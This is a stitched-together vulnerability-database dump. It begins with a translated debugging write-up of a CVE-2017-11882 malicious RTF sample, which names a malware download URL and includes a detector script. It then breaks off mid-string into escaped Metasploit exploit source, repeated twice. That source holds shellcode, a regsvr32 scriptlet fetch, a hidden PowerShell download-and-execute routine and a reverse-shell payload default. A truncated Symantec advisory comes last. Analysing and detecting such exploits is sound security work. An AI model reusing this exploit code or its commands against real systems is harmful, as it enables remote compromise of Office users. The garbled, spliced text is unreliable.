Debugging and analysis of a new variant sample exploiting CVE-2017-11882 - Vulnerability Warning - myhack58
2018-12-02T00:00:00
ID MYHACK58:62201892253 Type myhack58 Reporter Anonymous (佚名) Modified 2018-12-02T00:00:00
Description
We recently obtained a Word document with a .doc extension which, on inspection, is actually a Rich Text Format file. Opened in a test environment, it established a network connection and executed a program, so it was judged to be a malicious document. Preliminary analysis showed it to be a new sample exploiting CVE-2017-11882. CVE-2017-11882 and CVE-2018-0802, both rooted in the processing logic of the Office Equation Editor, are currently the most common vehicle for malicious Office documents. Analyses of the root cause and exploitation of these vulnerabilities are already available online, for example 360 Tianyan Lab's analysis of the latest CVE-2017-11882 antivirus-evasion technique, which abuses the Equation Editor's special processing logic, and Tencent PC Manager's analysis of a remote-control Trojan sample that combines the N-day CVE-2017-11882 with the 0-day CVE-2018-0802. The sample here differs slightly from those analyzed before and should be a variant of the CVE-2017-11882 exploit.
I. Basic behavior
Test environment: Windows 7 x64 SP1 (Chinese edition) with Office 2010 (Chinese edition).
When the sample is opened, the document body is displayed as garbled text, as shown below.
[screenshot]
In addition, an executable named emre.exe is created and run in the %temp% directory. A packet capture showed that emre.exe is produced by downloading http://ghthf. cf/cert/ochicha. exe, as shown below.
[screenshot]
II. Vulnerability debugging
1. Sample format
Opened in WinHex, the file looks as in the two screenshots below: the RTF header is followed directly by the displayed content.
[screenshot]
After that comes the object, as shown below.
[screenshot]
2. Preliminary RTF analysis
Analyzing the file with rtfobj gives the results shown below. The CLSID is 0002ce02-0000-0000-c000-000000000046, i.e. a Microsoft Equation Editor object.
[screenshot]
[screenshot]
The screenshot also shows that the object name is "eQuatiON native". The normal name of the object is "Equation Native"; the case change is probably another antivirus-evasion measure.
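As an added defender-side check (example code written for this write-up, not a tool from the original post), the following Python script scans the `\objdata` blocks of an RTF file for the Equation Editor CLSID and ProgID identified above and flags an "Equation Native" stream name whose casing differs from what Equation Editor itself writes. The RTF it builds for the test is constructed here and carries only the identifying markers, no equation data.

```python
import re

# Equation Editor 3.0 CLSID from the rtfobj output above:
# 0002ce02-0000-0000-c000-000000000046. In an OLE compound document the GUID is
# stored with its first three fields little-endian, which gives these raw bytes.
EQNEDT_CLSID_BYTES = bytes.fromhex("02ce020000000000c000000000000046")

# The "Equation Native" stream name is UTF-16LE inside the compound document; the
# sample mangled its case to "eQuatiON native", so the match is case-insensitive.
STREAM_NAME_RE = re.compile(
    b"".join(ch.encode("ascii") + b"\x00" for ch in "Equation Native"), re.IGNORECASE
)
# The OLE1 object header carries the ProgID "Equation.3" as a NUL-terminated string.
PROGID_RE = re.compile(rb"Equation\.3\x00", re.IGNORECASE)
# RTF form: {\*\objdata <hex bytes>} ; the hex is usually split across lines.
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)\}")


def scan_rtf(rtf_text: str) -> list:
    """Return one finding per \\objdata block that looks like an Equation Editor object."""
    findings = []
    for m in OBJDATA_RE.finditer(rtf_text):
        hexdata = re.sub(r"\s+", "", m.group(1))
        try:
            blob = bytes.fromhex(hexdata)
        except ValueError:
            continue  # malformed hex: not a well-formed object, skip it
        name_match = STREAM_NAME_RE.search(blob)
        stream_name = name_match.group(0).decode("utf-16-le") if name_match else None
        finding = {
            "objdata_offset": m.start(),
            "eqnedt_clsid": EQNEDT_CLSID_BYTES in blob,
            "equation3_progid": PROGID_RE.search(blob) is not None,
            "stream_name": stream_name,
            # Exact casing is what Equation Editor writes; anything else was hand-edited.
            "case_mangled": stream_name is not None and stream_name != "Equation Native",
        }
        if finding["eqnedt_clsid"] or finding["equation3_progid"] or stream_name:
            findings.append(finding)
    return findings


def build_constructed_objdata(stream_name: str) -> bytes:
    """CONSTRUCTED test blob, not the malicious sample: an OLE1 header for an
    Equation.3 object followed by a skeletal compound-document fragment carrying
    only the CLSID and the stream name. No MTEF record, no shellcode."""
    progid = b"Equation.3\x00"
    ole1_header = (
        bytes.fromhex("01050000")           # OLE version
        + bytes.fromhex("02000000")         # format id 2 = embedded object
        + len(progid).to_bytes(4, "little")
        + progid
    )
    cfb_fragment = (
        bytes.fromhex("d0cf11e0a1b11ae1")   # compound document signature
        + b"\x00" * 24
        + stream_name.encode("utf-16-le") + b"\x00" * 8
        + EQNEDT_CLSID_BYTES + b"\x00" * 8
    )
    return ole1_header + cfb_fragment


def build_constructed_rtf(stream_name: str) -> str:
    """Wrap the constructed object in a minimal RTF skeleton, hex split into 64-char lines."""
    hexdata = build_constructed_objdata(stream_name).hex()
    lines = "\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return ("{\\rtf1\\ansi\\deff0 {\\object\\objemb{\\*\\objclass Equation.3}"
            "{\\*\\objdata\n" + lines + "\n}}\\par}")


if __name__ == "__main__":
    # The stock name passes without the case flag; the sample's name trips it.
    for name in ("Equation Native", "eQuatiON native"):
        for finding in scan_rtf(build_constructed_rtf(name)):
            print(finding)
```

Run it against a real RTF by passing the file's text to `scan_rtf`; a hit on the CLSID with a mangled stream name is a strong indicator, while a stock name alone only says an Equation object is present.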
3. Vulnerability debugging
Following the published analyses of this vulnerability, we set a breakpoint directly in the vulnerable function at 0041160F.
[screenshot]
After the 11th rep operation, the stack is overwritten with 0x0043F775, as the following screenshots show.
[screenshot]
[screenshot]
In the EQNEDT32.EXE process the byte at 0x0043F775 is C3, which happens to be a retn instruction.
[screenshot]
After that instruction executes, control jumps to the shellcode, as shown below:
[screenshot]
4. Shellcode debugging and analysis
The shellcode lives in the eQuatiON native object and is split into two parts. The first part starts at offset 0x0826 of the object (the bytes B9 C439E66A, whose disassembly is shown at 0018F354 in the screenshot) and runs to 0x0851, followed by the four bytes 0x0043F7F5 (the address of the RETN instruction in the EQNEDT32.EXE process). The second part runs from offset 0x089E to the end of the object.
[screenshot]
The first part of the shellcode jumps to the second part; the assembly is shown below:
[screenshot]
Analysis shows that this shellcode segment executes a series of jmp instructions, a result of shellcode obfuscation and protection. For example:
[screenshot]
\"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? 
\"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#(unknown)'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb"}, {"lastseen": "2021-02-22T20:34:12", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "2017-11-21T19:47:02", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. 
The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = 
retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << 
'0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << 
'0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << 
\"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << 
'00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << 
\"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? 
\"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#(unknown)'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb"}], "symantec": [{"lastseen": "2018-03-14T22:40:38", "bulletinFamily": "software", "cvelist": ["CVE-2018-0802"], "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 Service Pack 2 (32-bit editions) \n * Microsoft Office 2010 Service Pack 2 (64-bit editions) \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n * Microsoft Office 2016 Click-to-Run (C2R) for 32-bit edition \n * Microsoft Office 2016 Click-to-Run (C2R) for 64-bit edition \n * Microsoft Office Compatibility Pack Service Pack 3 \n * Microsoft Word 2007 SP3 \n * Microsoft Word 2010 Service Pack 2 (32-bit editions) \n * Microsoft Word 2010 Service Pack 2 (64-bit editions) \n * Microsoft Word 2013 RT Service Pack 1 \n * Microsoft Word 2013 Service Pack 1 (32-bit editions) \n * Microsoft Word 2013 Service Pack 1 (64-bit editions) \n * Microsoft Word 2016 (32-bit edition) \n * Microsoft Word 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-01-09T00:00:00", "published": "2018-01-09T00:00:00", "id": "SMNTC-102347", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102347", "type": "symantec", "title": 